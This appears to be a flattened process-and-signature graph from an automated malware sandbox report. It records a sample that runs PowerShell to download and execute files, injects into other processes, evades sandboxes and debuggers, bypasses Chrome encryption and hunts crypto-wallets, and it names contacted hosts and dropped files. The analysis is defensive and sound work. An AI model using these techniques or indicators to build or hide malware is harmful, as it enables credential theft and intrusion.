Tries to detect sandboxes / dynamic malware analysis system (registry check) 19->198 34 powershell.exe 19->34         started        36 firefox.exe 19->36         started        file6 signatures7 process8 dnsIp9 104 defaulemot.run 104.21.32.1, 443, 49695, 49698 CLOUDFLARENETUS United States 21->104 80 C:\Users\user\...\D51OAO8D0TVNMCQXHC.exe, PE32 21->80 dropped 136 Antivirus detection for dropped file 21->136 138 Detected unpacking (changes PE section rights) 21->138 140 Attempt to bypass Chrome Application-Bound Encryption 21->140 156 8 other signatures 21->156 142 Modifies windows update settings 26->142 158 4 other signatures 26->158 160 6 other signatures 28->160 42 spoolsv.exe 28->42         started        144 Suspicious powershell command line found 30->144 146 Tries to download and execute files (via powershell) 30->146 45 powershell.exe 14 17 30->45         started        106 192.168.2.8, 443, 49673, 49681 unknown unknown 32->106 49 chrome.exe 32->49         started        51 483d2fa8a0d53818306efeb32d3.exe 34->51         started        57 2 other processes 34->57 53 firefox.exe 36->53         started        82 C:\Users\user\AppData\Local\...\fJeYDlA9n.hta, HTML 38->82 dropped 148 Binary is likely a compiled AutoIt script file 38->148 150 Tries to detect sandboxes and other dynamic analysis tools (window names) 38->150 152 Found API chain indicative of sandbox detection 38->152 154 Creates HTA files 38->154 59 8 other processes 38->59 55 powershell.exe 15 40->55         started        61 2 other processes 40->61 file10 signatures11 process12 dnsIp13 162 Modifies the context of a thread in another process (thread injection) 42->162 112 176.113.115.7, 49682, 49692, 49694 SELECTELRU Russian Federation 45->112 94 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 45->94 dropped 164 Found many strings related to Crypto-Wallets (likely being stolen) 45->164 63 483d2fa8a0d53818306efeb32d3.exe 4 45->63         started        67 conhost.exe 45->67         started        114 www.google.com 142.250.185.68, 443, 49713, 49714 GOOGLEUS United States 49->114 116 play.google.com 172.217.16.206 GOOGLEUS United States 49->116 118 2 other IPs or domains 49->118 166 Contains functionality to start a terminal service 51->166 168 Hides threads from debuggers 51->168 170 Tries to detect sandboxes / dynamic malware analysis system (registry check) 51->170 172 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 51->172 174 Powershell drops PE file 55->174 69 conhost.exe 59->69         started        71 conhost.exe 59->71         started        73 conhost.exe 59->73         started        75 4 other processes 59->75 file14 signatures15 process16 file17 96 C:\Users\user\AppData\Local\...\rapes.exe, PE32 63->96 dropped 120 Antivirus detection for dropped file 63->120 122 Detected unpacking (changes PE section rights) 63->122 124 Contains functionality to start a terminal service 63->124 126 5 other signatures 63->126 77 rapes.exe 63->77         started        signatures18 process19 signatures20 200 Antivirus detection for dropped file 77->200 202 Detected unpacking (changes PE section rights) 77->202 204 Contains functionality to start a terminal service 77->204 206 4 other signatures 77->206

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.